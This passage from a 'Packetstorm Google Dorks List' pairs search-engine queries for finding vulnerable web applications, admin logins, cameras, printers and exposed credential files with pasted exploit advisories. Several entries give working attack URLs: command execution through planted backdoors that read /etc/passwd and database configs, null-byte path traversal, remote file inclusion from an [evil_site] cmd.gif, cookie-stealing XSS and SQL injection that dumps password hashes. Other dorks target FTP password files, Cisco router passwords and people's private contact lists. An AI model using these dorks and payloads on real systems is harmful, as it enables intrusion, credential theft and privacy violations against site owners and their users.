Forget Bluetooth Hacking! You'll beamazed, at how many people sync theirCell Phones to the same Computersthey run some type of Server on. ThisQuery literally gives you access topeoples private contact lists that areether on there Smart Phones', or ontheir Windows CE wireless devices.Anattacker could Spoof Emails with the"SIG" details of the persons Phonefirmware, or simply collect the cellularnumbers for something later on downthe road.I even hypotheticlly cameacross some private text messages!

intitle:"NetCamLive Image" -.edu-.gov -johnny.ihackstuff.com

intitle:"NetCam Live Image" -.edu -.gov -johnny.ihackstuff.com

This is a googledork for StarDotnetcams. You can watch these camsand if you have the admin passwordyou can change configurations andother settings. They have a default

Page 199: Packetstorm Google Dorks List

admin name/pass but I haven't takenthe time to figure it out.

intitle:"ContentManagementSystem" "username"|"password"|"admin""Microsoft IE 5.5"-mambo -johnny.ihackstuff

intitle:"Content ManagementSystem" "username"|"password"|"admin""Microsoft IE 5.5" -mambo -johnny.ihackstuff

iCMS - Content ManagementSystem...Create websites withoutknowing HTML or web programming.

phpLDAPadminintitle:phpLDAPadmin filetype:phpinurl:tree.php |inurl:login.php |inurl:donate.php(0.9.6 | 0.9.7)

phpLDAPadminintitle:phpLDAPadmin filetype:phpinurl:tree.php | inurl:login.php |inurl:donate.php (0.9.6 | 0.9.7)

phpLDAPadmin 0.9.6 - 0.9.7/alpha5(possibly prior versions) systemdisclosure,remote code execution, crosssite scriptingsoftware:author site:http://phpldapadmin.sourceforge.net/description: phpLDAPadmin is a web-based LDAP client. It provideseasy,anywhere-accessible, multi-language administration for yourLDAP serverIf unpatched andvulnerable, a user can see any file ontarget system. A user can also executearbitrary php code and systemcommands or craft a malicious url toinclude malicious client side code thatwill be executed in the security contestof the victim browser.

"powered byITWorking" "powered by ITWorking"

saveWebPortal 3.4 remote codeexecution / admin check bypass /remote fileinclusion / cross sitescripting author site:http://www.circeos.itdownload page:http://www.circeos.it/frontend/index.php?page=downloadsa) remote codeexecution:a user can bypass admincheck, calling thisurl:http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Sourcenow can leave a backdoor in header.phpor some other file, example:afterediting template, user can executearbitrary system commands, throughaurl likethis:http://[target]/saveweb/header.php?

Page 200: Packetstorm Google Dorks List

command=ls%20-lato listdirectories...http://[target]/saveweb/header.php?command=cat%20config.inc.phpto see database username/passwordand admin panel username/password(now attacker have full access to siteconfiguration... can gotohttp://[target]/saveweb/admin/tologin...)http://[target]/saveweb/header.php?command=cat%20/etc/passwdto seepasswd file...b) arbitrary fileinclusion:a user can view any file onthe target server,if not with .phpextension:http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00can execute arbitrary file residenton target server, if with .phpextension,example:http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00can craft a malicious url to causevictim user to execute commands onexternalsite:http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00wherecmd.gif is a file like this:c)xss:c.1)http://[target]/saveweb/footer.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author_Domain=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Info=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Help=>alert(document.cookie)http://[target]/saveweb/header.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/header.php?L_Visitors=>alert(document.cookie)http://[target]/savewe

Page 201: Packetstorm Google Dorks List

b/header.php?count=>alert(document.cookie)http://[target]/saveweb/header.php?SITE_Logo=">alert(document.cookie)http://[target]/saveweb/header.php?BANNER_Url=">alert(document.cookie)http://[target]/saveweb/header.php?L_Sunday="}alert(document.cookie)

intitle:guestbookinurl:guestbook"powered byAdvancedguestbook 2.*""Sign theGuestbook"

intitle:guestbook inurl:guestbook"powered by Adva

Advanced Guestbook is prone to anHTML injection vulnerability. Thisissue is due to a failure in theapplication to properly sanitize user-supplied input before using it indynamically generatedcontent.Attacker-supplied HTML andscript code would be executed in thecontext of the affected Web site,potentially allowing for theft of cookie-based authentication credentials. Anattacker could also exploit this issue tocontrol how the site is rendered to theuser; other attacks are also possible.

intext:"MasterAccount" "DomainName" "Password"inurl:/cgi-bin/qmailadmin

intext:"Master Account" "DomainName" "Password" inurl:/cgi-bin/qmailadmin

qmail mail admin login pages.Thereare several vulnerabilities relating tothis software

intitle:"web-cyradm"|"by Lucde Louw" "This isonly for authorizedusers" -tar.gz -site:web-cyradm.org -johnny.ihackstuff

intitle:"web-cyradm"|"by Luc deLouw" "This is only for authorizedusers" -tar.gz -site:web-cyradm.org-johnny.ihackstuff

Web-cyradm is a software that gluestopnotch mailing technologies together.The focus is on administrating smalland large mailing environments.Web-cyradm is used by many differentusers. At the low end this arehomeusers which are providingmailadresses to their family. On themid to top end users are SMEenterprises, educational and otherorganizations.The software on whichweb-cyradm relies on is completelyfree and opensource software. So youget the maximung flexibility which thelowest TCO.

"Powered byFUDForum 2.7" -site:fudforum.org -johnny.ihackstuff

"Powered by FUDForum 2.7" -site:fudforum.org -johnny.ihackstuff

FUDforum is prone to a remotearbitrary PHP file uploadvulnerability.An attacker can merge animage file with a script file and upload

Page 202: Packetstorm Google Dorks List

it to an affected server.This issue canfacilitate unauthorized remoteaccess.FUDforum versions prior to2.7.1 are reported to be affected.Currently Symantec cannot confirm ifversion 2.7.1 is affected aswell.Affected versions:2.7

"You haverequested to accessthe managementfunctions" -.edu

"You have requested to access themanagement functions" -.edu

Terracotta web manager admin loginportal.

"Pleaseauthenticateyourself to getaccess to themanagementinterface"

"Please authenticate yourself to getaccess to the management interface" Photo gallery managment system login

ext:inc "pwd=""UID=" ext:inc "pwd=" "UID=" Database connection strings including

passwords

inurl:chitchat.php"choose graphic" inurl:chitchat.php "choose graphic"

rgod advises:Cyber-Cats ChitCHat 2.0permit cross site scripting attacks, letusers launch exploits from, let remoteusers obtain informations on targetusers, let insecurely delete/create files.This search does not find vulnerableversions, only generic.software:site:http://www.cyber-cats.com/php/rgodsite:http://rgod.altervista.orgmail:[email protected][/code]

"Calendarprogramming byAppIdeas.com"filetype:php

"Calendar programming byAppIdeas.com" filetype:php

phpCommunityCalendar 4.0.3(possibly prior versions) sql injection /login bypass / cross site scripting Thissearch does not narrow to vulnerableversions.software:site:http://open.appideas.comdownload:http://open.appideas.com/Calendar/original advisory:http://rgod.altervista.org/phpccal.html

"Powered by MD-Pro" | "made withMD-Pro"

"Powered by MD-Pro" | "made withMD-Pro"

MAXdev MD-Pro 1.0.73 (possiblyprior versions) remote code execution/cross site scripting / path disclosure.This search does not find vulnerableversions.software:site:

Page 203: Packetstorm Google Dorks List

http://www.maxdev.com/description:http://www.maxdev.com/AboutMD.phtmloriginal advisory:http://rgod.altervista.org/maxdev1073.html

"SoftwarePBLang" 4.65filetype:php

"Software PBLang" 4.65filetype:php

my advisory:[quote]PBLang 4.65(possibly prior versions) remote codeexecution / administrativecredentialsdisclosure / system informationdisclosure / cross site scripting /pathdisclosuresoftware:description:PBLang is a powerful flatfile BulletinBoard System. It combinesmanyfeatures of a professional board, butdoes not even require SQL support. Itiscompletely based on text-file.site:http://pblang.drmartinus.de/download:https://sourceforge.net/project/showfiles.php?group_id=629531) systemdisclosure:you can traverse directoriesand see any file (if not .php or .php3etc.) andinclude any file on targetsystem using '../' chars and null byte(%00),example:http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00vulnerable code in setcookie.php:...16$usrname=$HTTP_GET_VARS['u'];17@include($dbpath.'/'.$usrname.'temp');...2) remote code execution:boardstores data in files, when you register a[username] file without extensioniscreated in /db/members directory,inside we have php code executedwhen youlogin, so in location fieldtype:madrid";system($HTTP_POST_VARS[cmd]);echo "in /db/members/[username] filewe have...$userlocation="madrid";system($HTTP_GET_VARS[cmd]);echo "";...no way to access the scriptdirectly, /db/members is .htaccessprotectedand extra lines are deletedfrom files after you login, so youshould makeall in a POST request and

Page 204: Packetstorm Google Dorks List

re-registerthis is my proof of conceptexploit, to include [username] file Imake a GET request ofsetcookie.php?u=[username]%00&cmd=[command] but you can call usernamefile through some other inclusionsurely when you surf theforum:http://rgod.altervista.org/pblang465.html 3)admin/user credentialsdisclosure:you can see password hashof any user or admin sending thecommand:cat./db/members/[username]4) cross sitescripting:register and in location fieldtype:madrid"; echo"alert(document.cookie)then check thisurl:http://[target]/[path]/setcookie.php?u=[username]%005) pathdisclosure:http://[target]/[path]/setcookie.php?u=%00googledork: "SoftwarePBLang" filetype:phprgodsite:http://rgod.altervista.orgmail:[email protected]:http://rgod.altervista.org/pblang465.html[/quote]

"Powered by andcopyright class-1"0.24.4

"Powered by and copyright class-1"0.24.4

class-1 Forum Software v 0.24.4Remote code executionsoftware: site:http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is aPHP/MySQL driven web forum. It iswritten and distributedunder the GNUGeneral Public License which meansthat its source is freely-distributedandavailable to the general public.vulnerability: the way the forum checksattachment extensions...look at thevulnerable code at viewforum.php 256-272 lines.nothing seems so strange,but... what happen if you try to uploada filewith this name? :shell.php.' or 'a'='a;)[1] SQL INJECTION!The queryand other queries like thisbecome:SELECT * FROM [extensionstable name] WHERE extension='' or 'a'='a' AND file_type='Image'you have

Page 205: Packetstorm Google Dorks List

bypassed the check... now anexecutable file is uploaded, because forApache, bothon Windows and Linux afile with that name is an executable phpfile...you can download a poc file frommy site, aturl:http://rgod.altervista.org/shell.zipinside we have:you can do test manually,unzip the file, register, login, post thisfile as attachment, thengo to this url tosee the directory where the attachmenthas beenuploaded:http://[target]/[path]/viewattach.phpyou will be redirectedto:http://[target]/[path]/[upload_dir]/then launchcommands:http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwdto see/etc/passwdfilehttp://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.incto seedatabase username and passwordand soon...you can see my poc exploit at thisurl:http://www.rgod.altervista.org/class1.htmlgoogledork: "Powered by andcopyright class-1"rgodsite:http://rgod.altervista.orgmail: retrogod[at] aliceposta . it

"Powered byXcomic" "Powered by Xcomic"

"Powered by xcomic"this is a recentexploit, you can retrieve any file ontarget systemby using "../" chars andnull byte (%00),example:http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00or launchcommands:http://target/path_to_xcomic/initiailze.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00where cmd.gif is a file like this:Ihave read an advisory copy here:http://forum.ccteam.ru/archive/index.php/t-57.html

rdbqds -site:.edu - rdbqds -site:.edu -site:.mil -site:.gov Ceasar encryption is a rather simple

Page 206: Packetstorm Google Dorks List

site:.mil -site:.gov encryption. You simply shift letters upor down across the entire length of themessage... In the url I did this with theword "secret" which equals rdbqds.. (1char shift).It appears that protectedPDF documents use this veryencryption to protect its documents. Atleast one version of adobe acrobat did.A big thank you to Golfo for the linkshe provided in the forum toassist.http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.htmlhttp://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html

"Warning:""Cannot execute ablank commandin"

"Warning:" "Cannot execute ablank command in"

"Warning: passthru(): Cannot execute ablank command in" "Warning:system(): Cannot execute a blankcommand in" "Warning: exec():Cannot execute a blank command in"generally: "Warning:" "Cannot executea blank command in" this a php errormessage, essentially it shows hackedpages links where someone leaved abackdoor and the page haserror_reporting not set to 0... you canexecute shell commands simplyappending a var, guessing variablename, usually 'cmd' or 'command' orsomething else, example:http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd

"Mail-it Now!"intitle:"Contactform" |inurl:contact.php

"Mail-it Now!" intitle:"Contactform" | inurl:contact.php

Mail-it Now! 1.5 (possibly priorversions) contact.php remote codeexecutionsite:http://www.skyminds.net/source/description: a mail form scriptvulnerability:unsecure file creation -> remote codeexecutionwhen you post an attachmentand upload it to the server (usually to"./upload/" dir )the script rename thefile in this way:[time() function result]+ [-] + [filename that userchoose]spaces are simply replaced with"_" chars.So a user can post anexecutable attachment, calculate the

Page 207: Packetstorm Google Dorks List

time() result locallythen, if attachmentis a file like this:can launch commandson target system,example:http://[target]/[path]/[time()result]-[filename.php]?command=cat%20/etc/passwdu can find my poc code at thisurl:http://rgod.altervista.org/mailitnow.html

"maxwebportal"inurl:"default""snitz forums"+"homepage" -intitle:maxwebportal

"maxwebportal" inurl:"default""snitz forums" +"homepage" -intitle:maxwebportal

several vulnerabilities relating tothis.MaxWebPortal is a web portal andonline community system whichincludes features such as web-basedadministration, poll, private/publicevents calendar, user customizablecolor themes, classifieds, user controlpanel, online pager, link, file, article,picture managers and much more. Userinterface allows members to add news,content, write reviews and shareinformation among other registeredusers.h**p://www.maxwebportal.com/

"Powered byAzDg" (2.1.3 |2.1.2 | 2.1.1)

"Powered by AzDg" (2.1.3 | 2.1.2 |2.1.1)

AzDGDatingLite V 2.1.3 (possiblyprior versions) remote code executionsoftware: site: http://www.azdg.com/download page:http://www.azdg.com/scripts.php?l=english description:" AzDGDatingLite isa Free dating script working on PHPand MySQL. Multilanguage,Multitemplate, quick/simple search,feedback with webmaster, Adminmaillist, Very customizable " etc.vulnerability: look at the vulnerablecode in ./include/security.inc.php atlines ~80-90 ... else { if (isset($l) &&file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') { include_onceC_PATH.'/languages/'.$l.'/'.$l.'.php';include_onceC_PATH.'/languages/'.$l.'/'.$l.'_.php'; }... you can include arbitrary file on theserver using "../" and null byte (%00)(to truncate path to the filename you

Page 208: Packetstorm Google Dorks List

choose), example:http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 at the begin of the script wehave: @ob_start(); look at the php ob_start man page : "This function willturn output buffering on. While outputbuffering is active no output is sentfrom the script (other than headers),instead the output is stored in aninternal buffer." However, this is not asecure way to protect a script: buffer isnever showned, so you cannot seearbitrary file from the target machinethis time ... but you can executearbirtrary commands and after to seeany file :) : when you register to azdgyou can upload photos, so you canupload and include a gif or jpeg filelike this: usually photos are uploadedto./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] &[newfilename] using date(), time() andrand() functions you cannot calculatebut you can retrieve the filename fromazdg pages when file is showned onscreen (!), so you can do this:http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&cmd=cat%20/etc/passwd the output will beredirected to ./include/temp.txt so youmake a GET request of this file andyou have /etc/passwd file you can findmy poc exploit at thisurl:http://rgod.altervista.org/azdg.html

intitle:"ContentManagementSystem" "username"|"password"|"admin""Microsoft IE 5.5"-mambo -johnny.ihackstuff

intitle:"Content ManagementSystem" "username"|"password"|"admin""Microsoft IE 5.5" -mambo -johnny.ihackstuff

iCMS - Content ManagementSystem...Create dynamic interactivewebsites in minutes without knowingHTML or web programming. iCMS isa perfect balance of ease of use,flexibility, and power. If you are a WebDeveloper, you can dramaticallydecrease your Website developmenttime, decrease your costs and deliver a

Page 209: Packetstorm Google Dorks List

product that will yield higher profitswith less maintenance required!Dontthink there are any vulns attached tothis

"Powered by:Land Down Under800" | "Poweredby: Land DownUnder 801" -www.neocrome.net

"Powered by: Land Down Under800" | "Powered by: Land DownUnder 801" - www.neocrome.net

Land Down Under is prone to anHTML injection vulnerability. Thisissue is due to a failure in theapplication to properly sanitize user-supplied input before using it indynamically generatedcontent.Attacker-supplied HTML andscript code would be executed in thecontext of the affected Web site,potentially allowing for theft of cookie-based authentication credentials. Anattacker could also exploit this issue tocontrol how the site is rendered to theuser; other attacks are alsopossible.http://secunia.com/advisories/16878/

intext:"MasterAccount" "DomainName" "Password"inurl:/cgi-bin/qmailadmin

intext:"Master Account" "DomainName" "Password" inurl:/cgi-bin/qmailadmin

There seems to be several vulns forqmail.

"powered byGallery v""[slideshow]"|"images" inurl:gallery

"powered by Gallery v""[slideshow]"|"images" inurl:gallery

There is a script injection vuln for allversions.http://www.securityfocus.com/bid/14668

intitle:guestbookinurl:guestbook"powered byAdvancedguestbook 2.*""Sign theGuestbook"

intitle:guestbook inurl:guestbook"powered by Advanced guestbook2.*" "Sign the Guestbook"

Advanced Guestbook is prone to anHTML injection vulnerability. Thisissue is due to a failure in theapplication to properly sanitize user-supplied input before using it indynamically generatedcontent.Attacker-supplied HTML andscript code would be executed in thecontext of the affected Web site,potentially allowing for theft of cookie-based authentication credentials. Anattacker could also exploit this issue tocontrol how the site is rendered to theuser; other attacks are alsopossible.http://secunia.com/product/4356/http://www.packetalarm.com/sec_n

Page 210: Packetstorm Google Dorks List

otices/index.php?id=2209&delimit=1#detail

intitle:"Backup-Management(phpMyBackupv.0.4 beta * )" -johnny.ihackstuff

intitle:"Backup-Management(phpMyBackup v.0.4 beta * )" -johnny.ihackstuff

phpMyBackup is an mySQL backuptool, with features like copyingbackups to a different server usingFTP.

"Powered byMonster Top List"MTLnumrange:200-

"Powered by Monster Top List"MTL numrange:200-

2 Step dork - Change url to addfilename "admin.php" (just removeindex.php&stuff=1&me=2 if you haveto) for the admin login.This searchfinds more pages rather than focusingon the admin login page itself, thus the2 step dork is more effective.

"login prompt"inurl:GM.cgi "login prompt" inurl:GM.cgi

GreyMatter is prone to an HTMLinjection vulnerability. This issue isdue to a failure in the application toproperly sanitize user-supplied inputbefore using it in dynamicallygenerated content.

"e107.org2002/2003"inurl:forum_post.php?nt

"e107.org 2002/2003"inurl:forum_post.php?nt

e107 is prone to an input validationvulnerability. This issue is due to afailure in the application to properlysanitize user-supplied input.Successfulexploitation of this issue will permit anattacker to create arbitrary forummessageposts.http://www.securityfocus.com/bid/14699

filetype:datinurl:Sites.dat filetype:dat inurl:Sites.dat

If you want to find out FTP passwordsfrom FlashFXP Client, just type thisquery in google and you'll find filescalled Sites.dat which contain ftp sites,usernames and passwords. If you wantto use it, just install FlashFXP andcopy whole section to your sites.dat file(file is in your flashFXP directory).

intext:"enablepassword 7" intext:"enable password 7"

some people are that stupid to keeptheir Cisco routers config files on site.You can easly find out configs andpassword alog with IP addresses of thisdevices. Above string let you find weakpasswords, which are encrypted butcan be decrypted by free tool called

Page 211: Packetstorm Google Dorks List

GetPass and provided by boson.com"you can nowpassword" | "this isa special page onlyseen by you. yourprofile visitors"inurl:imchaos

"you can now password" | "this is aspecial page only seen by you. yourprofile visitors" inurl:imchaos

IMchaos link tracker admin pages.Reveals AIM screennames, IPADDRESSES AND OTHER INFO viadetails link. Logs can also be viewedand deleted from this page.

XOOPS CustomInstallation XOOPS Custom Installation

XOOPS custom installation wizards,allow users to modify installationparameters. May also reveal sqlusername, password and tableinstallations via pre-filled form data.

intitle:"netbotzappliance" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces

intitle:"netbotz appliance" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces

Netbotz devices are made to monitorvideo, temperature, electricity and dooraccess in server rooms. These systemsusually have multiple cameras. Theinformation by itself might not be verydangerous, but someone could use it toplan physical entrance to a serverroom. This is not good information tohave publicly available.

"Powered by PHPAdvanced TransferManager"

"Powered by PHP AdvancedTransfer Manager v1.30"

PHP Advanced Transfer Managerv1.30 underlying system disclosure /remote command execution / cross sitescriptingrgodsite:http://rgod.altervista.orgmail: retrogodat aliceposta it

"Welcome toAdministration""General" "LocalDomains" "SMTPAuthentication"inurl:admin

"Welcome to Administration""General" "Local Domains" "SMTPAuthentication" inurl:admin

This reveals admin site for ArgoSoftware Design Mail Server.

"Powered byCuteNews" "Powered by CuteNews"

CuteNews 1.4.0 (possibly priorversions) remote codeexecutionsoftware site:http://cutephp.com/description: "Cutenews is a powerful and easy for usingnews management system that use flatfiles to store its database. It supportscomments, archives, search function,image uploading, backup function, IPbanning, flood protection ..."rgodsite:http://rgod.altervista.orgmail: retrogod

Page 212: Packetstorm Google Dorks List

[at] aliceposta itintitle:rapidshareintext:login intitle:rapidshare intext:login Rapidshare login passwords.

intitle:"PHProjekt- login" loginpassword

intitle:"PHProjekt - login" loginpassword

PHProjekt is a group managingsoftware for online calenders, chat,forums, etc. I looked around and i thinkthe default admin login/pass isroot/root. Results 1 - 23 of about 851when i posted this

Phasernumrange:100-100000 NameDNS IP "MorePrinters" indexhelp filetype:html |filetype:shtml

Phaser numrange:100-100000Name DNS IP "More Printers"index help filetype:html |filetype:shtml

This is a search for various phasernetwork printers. With this search youcan look for printers to print test/helppages, monitor the printer, andgenerally mess with people.

intitle:"OriteIC301" |intitle:"ORITEAudio IP-CameraIC-301" -the -a

intitle:"Orite IC301" |intitle:"ORITE Audio IP-CameraIC-301" -the -a

This search finds orite 301 netcamswith audio capabilities.

"Powered byGTChat0.95"+"UserLogin"+"Remember my logininformation"

"Powered by GTChat 0.95"+"UserLogin"+"Remember my logininformation"

There is a (adduser) remote denial ofservice vulnerabilty on version 0.95

inurl:/modcp/intext:Moderator+vBulletin

inurl:/modcp/intext:Moderator+vBulletin

there have been several dorks forvBulletin, but I could not find one inthe search that targets the moderatorscontrol panel login page - this searchtargets versions 3.0 onwards.

intitle:"i-securev1.1" -edu intitle:"i-secure v1.1" -edu I-Secure Login Pages

intitle:"Login tothe forums [email protected]"inurl:login.cfm?id=

intitle:"Login to the forums [email protected]"inurl:login.cfm?id=

Aimoo Login Pages. "Looking for afree message board solution? Aimooprovides one of the most powerful,feature rich, community based forumservices available!"

intitle:"LoginForum PoweredBy AnyBoard"

intitle:"Login Forum Powered ByAnyBoard" intitle:"If you are a newuser:" intext:"Forum Powered By

Anyboard Login Portals. In addition,Avulnerability has been reported inNetbula Anyboard 9.x "that may allow

Page 213: Packetstorm Google Dorks List

intitle:"If you are anew user:"intext:"ForumPowered ByAnyBoard"inurl:gochat -edu

AnyBoard" inurl:gochat -edu a remote attacker to gain access tosensitive data. This problem is due toan information disclosure issue that canbe triggered by an attacker sendingspecific HTTP requests to a vulnerablehost. This will result in sensitiveinformation about the system beingrevealed to the attacker."

"Mimicboard2086"+"2000NobutakaMakino"+"password"+"message"inurl:page=1

"Mimicboard2 086"+"2000NobutakaMakino"+"password"+"message"inurl:page=1

Mimicboard2 is prone to multipleHTML injection vulnerabilities. Theseissues are due to a failure in theapplication to properly sanitize user-supplied input before using it indynamically generated content.

"your password is"filetype:log "your password is" filetype:log

This search finds log files containingthe phrase (Your password is). Thesefiles often contain plaintext passwords,although YMMV.

"admin accountinfo" filetype:log "admin account info" filetype:log

searches for logs containing adminserver account information such asusername and password.

"Warning:Supplied argumentis not a valid File-Handle resourcein"

"Warning: Supplied argument is nota valid File-Handle resource in"

This error message cqan reveal pathinformation. This message (like othererror messages) is often posted to helpforums, although the message stillreveals path info in this form. Considerusing the site: operator to narrowsearch.

"Maintained withSubscribe Me2.044.09p"+"Professional"inurl:"s.pl"

"Maintained with Subscribe Me2.044.09p"+"Professional"inurl:"s.pl"

subscribe Me Pro 2.0.44.09p is proneto a directory traversal vulnerability.This is due to a lack of propersanitization of user-supplied input.Exploitation of this vulnerability couldlead to a loss of confidentiality asarbitrary files are disclosed to anattacker. Information obtained throughthis attack may aid in further attacksagainst the underlyingsystem.http://www.securityfocus.com/bid/14817/exploit

"Warning:" "SAFEMODE Restrictionin effect." "Thescript whose uid

"Warning:" "SAFE MODERestriction in effect." "The scriptwhose uid is" "is not allowed toaccess owned by uid 0 in" "on line"

This error message reveals full pathinformation. Recommend use of site:operator to narrow searches.

Page 214: Packetstorm Google Dorks List

is" "is not allowedto access ownedby uid 0 in" "online"

intitle:"net2ftp""powered bynet2ftp" inurl:ftpOR intext:loginOR inurl:login

intitle:"net2ftp" "powered bynet2ftp" inurl:ftp OR intext:loginOR inurl:login

net2ftp is a web-based FTP clientwritten in PHP. Lets explain this indetail. Web-based means that net2ftpruns on a web server, and that you usea browser (for example InternetExplorer or Mozilla)

inurl:cartwiz/store/index.asp inurl:cartwiz/store/index.asp

The CartWIZ eCommerce ShoppingCart System will help you build youronline store through an interactiveweb-based e-commerce administrationinterface.There are, multiple sqlinjection and xss in cartwiz aspcart.http://neworder.box.sk/explread.php?newsid=13534

intitle:"Controlpanel" "ControlPanel Login"ArticleLiveinurl:admin -demo

intitle:"Control panel" "ControlPanel Login" ArticleLiveinurl:admin -demo

Build, manage and customize your ownsearch engine friendly news / articlesite from scratch -- with absolutely notechnical experience.Authenticationbypass, sql injections and xss inArticleLive2005http://neworder.box.sk/explread.php?newsid=13582

"Powered byautolinks pro 2.1"inurl:register.php

"Powered by autolinks pro 2.1"inurl:register.php

AutoLinksPro is a linking solution.AutoLinksPro link exchange softwarewas built for the search engines to helpimprove your search engine rankings,traffic, and sales.Remote PHP FileIncludeVulnerabilityhttp://www.securityfocus.com/archive/1/409529/30/120/threaded

"CosmoShop byZaunz Publishing"inurl:"cgi-bin/cosmoshop/lshop.cgi" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -

"CosmoShop by Zaunz Publishing"inurl:"cgi-bin/cosmoshop/lshop.cgi"-johnny.ihackstuff.com -V8.10.106-V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*

cosmoshop is a comercial shop systemwritten as a CGI.vulnerabilities:sqlinjection, passwords saved in cleartext,view anyfilehttp://www.securityfocus.com/archive/1/409510/30/120/threaded

Page 215: Packetstorm Google Dorks List

V8.11*"Powered byWoltlab BurningBoard" -"2.3.3" -"v2.3.3" -"v2.3.2"-"2.3.2"

"Powered by Woltlab BurningBoard" -"2.3.3" -"v2.3.3" -"v2.3.2"-"2.3.2"

It's an exact replica of vbulletin but it isfree.SQL-InjectionExploit:http://www.governmentsecurity.org/archive/t14850.html

"Please login withadmin pass" -"leak" -sourceforge

"Please login with admin pass" -"leak" -sourceforge

PHPsFTPd is a web basedadministration and configurationinterface for the SLimFTPd ftp serverItcan be used an any http server thatsuports PHP and does not need adatabase or adittional php modules,only SlimFTPD It allows theadministrators of the ftp server toconfigurate it from within this interfaceas opposed to its native ascii conf.file Itshows statistics about the users thataccesed the server , the files that weredownloaded , server breakdownsetcAdmin password leak:http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html

intitle:"PHPTopSites FREERemote Admin"

intitle:"PHP TopSites FREERemote Admin"

PHP TopSites is a PHP/MySQL-basedcustomizable TopList script. Mainfeatures include: Easy configurationconfig file; MySQL database backend;unlimited categories, Site rating onincoming votes; Special Rating fromWebmaster; anti-cheating gateway;Random link; Lost password function;Webmaster Site-approval; Edit site;ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux CronFree; Frame Protection and muchmore.PHP TopSites DisclosesConfiguration Data to RemoteUsers:http://www.securitytracker.com/alerts/2005/Jul/1014552.htmlPS: allversions are vulnerable at time ofwriting.

intitle:"iDevAffiliate - admin" -demo

intitle:"iDevAffiliate - admin" -demo

Affiliate Tracking Software Addingaffiliate tracking software to your siteis one of the most effective ways toachieve more sales and more traffic!Our affiliate software installs in just

Page 216: Packetstorm Google Dorks List

minutes and integrates easily intoyourexisting website.

"powered by mylittle forum" "powered by my little forum"

My Little Forum 1.5 / 1.6beta SQLInjectionsoftware:site:http://www.mylittlehomepage.net/my_little_forumsoftware: "A simple web-forum that supports classical threadview (message tree)as well asmessagebord view to display themessages.Requires PHP > 4.1 and aMySQL database."1) look at thevulnerable code at line 144 insidesearch.php:... $result =mysql_query("SELECT id, pid, tid,DATE_FORMAT(time + INTERVAL". $time_difference."HOUR,'".$lang['time_format']."') ASUhrzeit, DATE_FORMAT(time +INTERVAL ".$time_difference."HOUR, '".$lang['time_format']."') ASDatum, subject, name, email, hp, place,text, category FROM ".$forum_table."WHERE ".$search_string." ORDERBY tid DESC, time ASC LIMIT".$ul.", ".$settings['search_results_per_page'],$connid);...now goto the search page,select "phrase", and type:[whatever]%'UNION SELECT user_pw, user_pw,user_pw, user_pw, user_pw,user_pw,user_pw, user_pw, user_pw,user_pw, user_pw, user_pw FROMforum_userdatawhereuser_name='[username]' /*ifmagic quotes are off you will have(guess?...) any admin/user passwordhash'cause $searchstring var is notfiltered...u can fin my poc exploithere:http://rgod.altervista.org/mylittle15_16b.html2) 1.6beta is vulnerableeven, we have:...$result =mysql_query("SELECT id, pid, tid,UNIX_TIMESTAMP(time +INTERVAL ".$time_difference."HOUR) ASUhrzeit, subject, name,email, hp, place, text, category FROM

Page 217: Packetstorm Google Dorks List

".$db_settings['forum_table']."WHERE".$search_string." ORDER BY tidDESC, time ASC LIMIT ".$ul.",".$settings['search_results_per_page'],$connid);...you have same results,deleting a statement in injectionstring:[whatever]%' UNION SELECTuser_pw, user_pw, user_pw, user_pw,user_pw, user_pw,user_pw, user_pw,user_pw, user_pw, user_pw FROMforum_userdatawhereuser_name='[username]' /*

"powered bymailgust" "powered by mailgust"

